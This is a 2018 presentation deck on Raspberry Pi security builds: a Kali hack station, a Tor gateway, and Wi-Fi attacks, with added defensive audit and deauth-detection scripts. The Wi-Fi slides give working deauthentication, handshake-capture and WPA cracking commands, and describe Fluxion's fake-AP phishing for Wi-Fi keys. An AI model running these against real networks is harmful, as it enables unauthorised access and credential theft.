Thursday, June 21, 2018 1
Raspberry Pi 3
Whoami
Sanket Kakde
Sr.Consultant @ LTI
www.linkedin.com/in/sanket-kakde-1717a677
https://twitter.com/kakdesanket?s=09
What will we be doing today?
✓ Hackstation
✓ Onion-Pi / TOR Switch
✓ Firewall
✓ Intrusion Detection System
✓ Wi-Fi Attack
✓ Domain Controller
What is the Raspberry Pi?
✓ A low cost, credit-card sized computer
✓ Small computer that can communicate with the outside world (Internet)
✓ Cost effective computer
✓ Uses a standard keyboard & mouse, plugs into a monitor or TV
Raspberry Pi Hardware
✓ 64-bit quad-core ARM Cortex-A53 processor clocked at 1.2 GHz
✓ 1 GB RAM LPDDR2-900
✓ Videocore IV GPU
✓ On-board 802.11n WiFi
✓ Bluetooth 4.0
✓ Ethernet 10/100
✓ Video Output – HDMI
✓ Storage micro-SD
✓ 40 pin GPIO
✓ 4 USB Ports
✓ CSI Camera Port
Raspberry Pi Kit
What do I support ???
Basic Hack Station Setup
Steps to install KALI Linux NEXMON
✓ Download KALI (https://www.offensive-security.com/kali-linux-arm-images/)
✓ Install Win32DiskImager
✓ Connect SD Card to computer
✓ Write image to SD Card using Win32DiskImager
✓ Good to Go
✓ Verify installation by connecting the Raspberry Pi to your network
    nmap -sn 192.168.0.1/24
    ssh root@192.168.0.125
✓ Update & upgrade to the latest version
    apt-get update
    apt-get upgrade
Hack Station Configuration
✓ Resize FS to utilize SD Card
    Install tightvncserver
        apt-get install tightvncserver
    Install gparted: resize the file system
Steps to configure Access Point on RASPI
✓ Install hostapd & isc-dhcp-server
    hostapd: a user space daemon for access point and authentication servers
        apt-get install hostapd
    isc-dhcp-server: DHCP server for the access point
        apt-get install isc-dhcp-server
✓ Configure DHCP Server
✓ Modify configuration file: vim /etc/dhcp/dhcpd.conf
    #option domain-name
    #option domain-name-servers
    authoritative;
    subnet 192.168.42.0 netmask 255.255.255.0 {
        range 192.168.42.10 192.168.42.50;
        option broadcast-address 192.168.42.255;
        option routers 192.168.42.1;
        default-lease-time 600;
        max-lease-time 7200;
    }
Hack Station Configuration
✓ Configure DHCP Server
✓ Edit the default DHCP config file to set
    INTERFACES="wlan0"
✓ Turn off wireless interface
    ifdown wlan0
✓ Assign static IP to wireless interface
✓ vim /etc/network/interfaces
    auto lo
    iface lo inet loopback
    iface eth0 inet dhcp
    allow-hotplug wlan0
    iface wlan0 inet static
        address 192.168.42.1
        netmask 255.255.255.0
✓ Assign IP address to wireless interface
    ifconfig wlan0 192.168.42.1
Hack Station Configuration
✓ Configure Hostapd
✓ Edit Configuration file /etc/hostapd/hostapd.conf
interface=wlan0
#driver=rtl871xdrv
ssid=TORNet
country_code=US
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=Raspberry
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
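The passphrase and management-frame settings in this hostapd.conf decide how well the access point stands up to the dictionary, mask and deauthentication techniques shown on the later Wi-Fi slides. The script below is an added example, not part of the original slides: it lints the security-relevant lines of the slide's config, and the function names, finding codes and the 12-character minimum are assumptions.

```sh
#!/bin/sh
# Added example (not from the slides): lint a hostapd.conf for weak settings.
# MIN_PSK_LEN and the finding codes are assumptions made for this example.
MIN_PSK_LEN=${MIN_PSK_LEN:-12}

conf_get() {   # conf_get FILE KEY -> last uncommented value of KEY
    awk -F= -v k="$2" '$1 == k { sub(/^[^=]*=/, ""); v = $0 } END { print v }' "$1"
}

audit_hostapd() {   # audit_hostapd FILE -> one finding per line on stdout
    f=$1
    wpa=$(conf_get "$f" wpa)
    psk=$(conf_get "$f" wpa_passphrase)
    ciphers="$(conf_get "$f" wpa_pairwise) $(conf_get "$f" rsn_pairwise)"
    pmf=$(conf_get "$f" ieee80211w)

    if [ "$wpa" != 2 ]; then
        echo "WPA_MODE: wpa=${wpa:-unset}, expected wpa=2 (WPA2 only)"
    fi
    case "$ciphers" in
        *TKIP*) echo "TKIP: pairwise ciphers include TKIP, keep CCMP only" ;;
    esac
    if [ -n "$psk" ] && [ "${#psk}" -lt "$MIN_PSK_LEN" ]; then
        echo "PSK_SHORT: passphrase has ${#psk} characters, minimum is $MIN_PSK_LEN"
    fi
    # A single character class is what wordlists and digit masks cover first.
    if printf '%s\n' "$psk" | grep -Eq '^([A-Za-z]+|[0-9]+)$'; then
        echo "PSK_ONE_CLASS: passphrase is letters only or digits only"
    fi
    case "${pmf:-0}" in
        1 | 2) ;;
        *) echo "PMF_OFF: ieee80211w is not enabled, deauth frames are unauthenticated" ;;
    esac
    if [ -n "$(find "$f" -perm -004 2>/dev/null)" ]; then
        echo "WORLD_READABLE: $f exposes the passphrase to every local user"
    fi
    return 0
}

slide_config() {   # security-relevant lines of the hostapd.conf on the slide
    cat <<'EOF'
interface=wlan0
ssid=TORNet
wpa=2
wpa_passphrase=Raspberry
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
EOF
}

tmp=$(mktemp) && slide_config > "$tmp" && chmod 600 "$tmp"
audit_hostapd "$tmp"
rm -f "$tmp"
```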
Hack Station Configuration
✓ Configure hostapd
✓ Edit default config file /etc/default/hostapd
    DAEMON_CONF="/etc/hostapd/hostapd.conf"
✓ Edit /etc/sysctl.conf
    net.ipv4.ip_forward=1
✓ Save and Flush iptables rules (Not mandatory)
    sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
    iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
    sh -c "iptables-save > /etc/iptables/rules.v4"
BUG: Kali Nexmon has a bug in the Wi-Fi driver; you must bring up a monitor interface before starting hostapd
    iw phy phy0 interface add mon0 type monitor && ifconfig mon0 up
✓ Start services and enable them at startup
    service hostapd start
    service isc-dhcp-server start
    update-rc.d hostapd enable
    update-rc.d isc-dhcp-server enable
Hack Station Configuration
✓ Configure SSH Interface
✓ vim /etc/ssh/sshd_config
✓ Set ListenAddress to the wlan0 interface address, in this case 192.168.42.1
Hack Station Use Cases
✓ Red Teaming
✓ Pocket Computer
✓ Network Penetration Testing
✓ Social Engineering Attack
✓ …..Contd
Demo
Raspberry Pi 3
TOR Switch
TOR-PI Setup
Steps to install KALI Linux NEXMON
✓ Download KALI (https://www.offensive-security.com/kali-linux-arm-images/)
✓ Install Win32DiskImager
✓ Connect SD Card to computer
✓ Write image to SD Card using Win32DiskImager
✓ Good to Go
✓ Verify installation by connecting the Raspberry Pi to your network
    nmap -sn 192.168.0.1/24
    ssh root@192.168.0.125
✓ Update & upgrade to the latest version
    apt-get update
    apt-get upgrade
✓ Set up hostapd and isc-dhcp-server as demonstrated in the previous slides.
TOR-PI Configuration
✓ Install TOR
    apt-get update
    apt-get install tor
✓ Edit TOR configuration file
✓ vim /etc/tor/torrc
    Log notice file /var/log/tor/notices.log
    VirtualAddrNetwork 10.192.0.0/10
    AutomapHostsSuffixes .onion,.exit
    AutomapHostsOnResolve 1
    TransPort 9040
    TransListenAddress 192.168.42.1
    DNSPort 53
    DNSListenAddress 192.168.42.1
✓ Set up iptables to route traffic
    iptables -F
    iptables -t nat -F
    iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22
    iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 53
    iptables -t nat -A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040
    iptables -t nat -L
    sh -c "iptables-save > /etc/iptables.ipv4.nat"
✓ Create log files
    touch /var/log/tor/notices.log
    chown debian-tor /var/log/tor/notices.log
    chmod 644 /var/log/tor/notices.log
✓ Start TOR services
    service tor start
    service tor status
    update-rc.d tor enable
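The REDIRECT rules above only cover TCP and DNS arriving on wlan0, and their order matters because the port 22 exemption has to match before the catch-all. The script below is an added example, not part of the original slides: it checks an iptables-save dump for those properties; the sample dump is constructed from the slide's rules, and the function names and finding codes are assumptions.

```sh
#!/bin/sh
# Added example (not from the slides): lint an iptables-save dump of the Tor
# gateway rules. Interface and ports are the slides'; finding codes are made up.

check_tor_gateway() {   # stdin: iptables-save text; stdout: one finding per line
    awk -v lan="wlan0" -v trans="9040" -v dns="53" '
    /^\*/ { table = substr($1, 2); next }          # "*nat", "*filter"
    table == "filter" && $1 == ":FORWARD" { fwd_policy = $2 }
    table == "nat" && / -j MASQUERADE/ { masq = 1 }
    table == "filter" && /^-A FORWARD / && index($0, " -i " lan " ") &&
        / -j (DROP|REJECT)/ { fwd_blocked = 1 }
    table == "nat" && /^-A PREROUTING / && index($0, " -i " lan " ") {
        n++                                        # rule position on this interface
        to = ($(NF - 1) == "--to-ports") ? $NF : ""
        if (/ -p tcp / && / --dport 22 / && to == "22") { if (!ssh) ssh = n }
        else if (/ -p tcp / && !/ --dport / && to == trans) { if (!tcp) tcp = n }
        else if (/ -p udp / && / --dport 53 / && to == dns) dns_ok = 1
    }
    END {
        if (!tcp)
            print "TCP_NOT_REDIRECTED: no catch-all TCP redirect to TransPort " trans
        else if (!ssh || ssh > tcp)
            print "SSH_ORDER: port 22 exemption missing or after the catch-all rule"
        if (!dns_ok)
            print "DNS_NOT_REDIRECTED: client DNS is not sent to DNSPort " dns
        if (masq)
            print "MASQUERADE: a NAT rule remains that lets clients bypass Tor"
        if (!fwd_blocked && fwd_policy != "DROP")
            print "FORWARD_OPEN: with ip_forward=1, non-redirected traffic (other UDP, ICMP) is routed outside Tor"
    }'
}

slide_ruleset() {   # constructed: the slide rules as iptables-save prints them
    cat <<'EOF'
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -i wlan0 -p tcp -m tcp --dport 22 -j REDIRECT --to-ports 22
-A PREROUTING -i wlan0 -p udp -m udp --dport 53 -j REDIRECT --to-ports 53
-A PREROUTING -i wlan0 -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 9040
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
EOF
}

slide_ruleset | check_tor_gateway
```

Adding `iptables -A FORWARD -i wlan0 -j DROP` clears the FORWARD_OPEN finding without affecting the redirected traffic, which is delivered locally through the INPUT chain.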
TOR-PI Use Cases
Anonymous Browsing
Hide online traces
Deep Web / Dark Web Market Access
TOR Relays
Demo
Wi-Fi Hacking
Kali Linux can be used for many things, but it is probably best known for its ability to penetration test, or “hack,” WPA and WPA2 networks.
All we need is a Raspberry Pi and a wireless network interface capable of packet injection that supports promiscuous (monitoring) mode.
Raspberry Pi 3
Raspberry + Alpha Card
Wi-Fi Security
Target Protocols
WEP : Wired Equivalent Privacy
WPA / WPA2 : Wi-Fi Protected Access
Wi-Fi Attack Tools
Aircrack-ng
airmon-ng:
    Converts our wireless card into a promiscuous mode wireless card.
airodump-ng:
    Captures packets of our specification.
aireplay-ng:
    Aireplay-ng is another powerful tool in our aircrack-ng arsenal, and it can be used to generate or accelerate traffic on the AP.
aircrack-ng:
    Used to crack captured hashes.
Wi-Fi Attack Tools
Commands
✓ List network interfaces and their mode
    iwconfig
✓ Enable monitor mode on wlan0
    airmon-ng start wlan0
✓ Sniff Wi-Fi packets, list all nearby stations
    airodump-ng wlan0mon
✓ Scan a particular station for clients and capture the handshake
    airodump-ng wlan0mon --bssid C8:3A:35:37:BA:18 --channel 11 --write test
✓ Deauth all the clients from Wi-Fi
    aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 wlan0mon
✓ Deauth a specific client from Wi-Fi
    aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 -c 48:88:CA:E9:83:0D wlan0mon
✓ Password cracking
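On the defending side, the deauthentication commands above appear on the air as a burst of deauth frames for one BSSID, aimed at either the broadcast address or a single client. The script below is an added example, not part of the original slides: a sliding-window detector over exported frame summaries; the input layout, thresholds, function names and sample frames are assumptions or constructed data.

```sh
#!/bin/sh
# Added example (not from the slides): flag deauthentication bursts.
# Input: one deauth frame per line, "epoch<TAB>bssid<TAB>destination", sorted by
# time, e.g. exported on a monitoring sensor with
#   tshark -r capture.pcap -Y "wlan.fc.type_subtype == 12" \
#          -T fields -e frame.time_epoch -e wlan.bssid -e wlan.da
# WINDOW and THRESHOLD are assumed defaults; tune them for your site.
WINDOW=${WINDOW:-5}          # seconds of history kept per (bssid, destination)
THRESHOLD=${THRESHOLD:-20}   # frames inside the window that count as a flood

detect_deauth_flood() {   # stdin: frame lines; stdout: one alert per burst
    awk -F '\t' -v w="$WINDOW" -v th="$THRESHOLD" '
    NF >= 3 {
        bssid = tolower($2); da = tolower($3); k = bssid SUBSEP da
        ts[k, ++tail[k]] = $1
        # Slide the window: forget frames older than w seconds for this pair.
        while ($1 - ts[k, head[k] + 1] > w) delete ts[k, ++head[k]]
        n = tail[k] - head[k]
        if (n < th) { alerted[k] = 0; next }     # quiet again, re-arm the alert
        if (!alerted[k]) {                       # fire once per burst
            scope = (da == "ff:ff:ff:ff:ff:ff") ? "all-clients" : "single-client"
            printf "DEAUTH_FLOOD bssid=%s target=%s scope=%s frames=%d window=%ss at=%s\n",
                   bssid, da, scope, n, w, $1
            alerted[k] = 1
        }
    }'
}

sample_frames() {   # constructed data, not a real capture
    awk 'BEGIN {
        # 40 broadcast deauth frames in two seconds: a flood
        for (i = 0; i < 40; i++)
            printf "%.2f\t02:00:00:00:00:01\tff:ff:ff:ff:ff:ff\n", 1000 + i * 0.05
        # three isolated deauths to one client a minute apart: normal churn
        for (i = 0; i < 3; i++)
            printf "%d\t02:00:00:00:00:01\t02:00:00:00:00:aa\n", 1010 + i * 60
    }'
}

sample_frames | detect_deauth_flood
```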
Password Cracking using GPU Hashcat & Aircrack-ng
✓ Password cracking using aircrack-ng
✓ aircrack-ng -w Wifidictionary --bssid 50:C7:BF:79:4A:3A File.cap
✓ Password Cracking using Hashcat
✓ Convert *.cap file into hccapx
✓ Online
✓ Converter: https://hashcat.net/cap2hccapx/
✓ Offline
✓ Tool: https://github.com/hashcat/hashcat-utils
✓ Cracking
✓ Dictionary attack
✓ hashcat.exe -m 2500 capture.hccapx rockyou.txt
✓ Brute-Force attack
✓ hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d
✓ Rule-based attack
✓ hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt
Demo
Wi-Fi Social Engineering Attack Fluxion
Fluxion is a security auditing and social-engineering research tool.
The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack.
Compatible with the latest release of Kali (rolling).
How it works ?
✓Scan the networks.
✓Capture a handshake
✓Launch a Fake AP instance
✓ Fake Use WEB Interface
✓Fake DNS Server
✓Deauth users
✓Captive portals
Wi-Fi Social Engineering Attack Fluxion
Demo
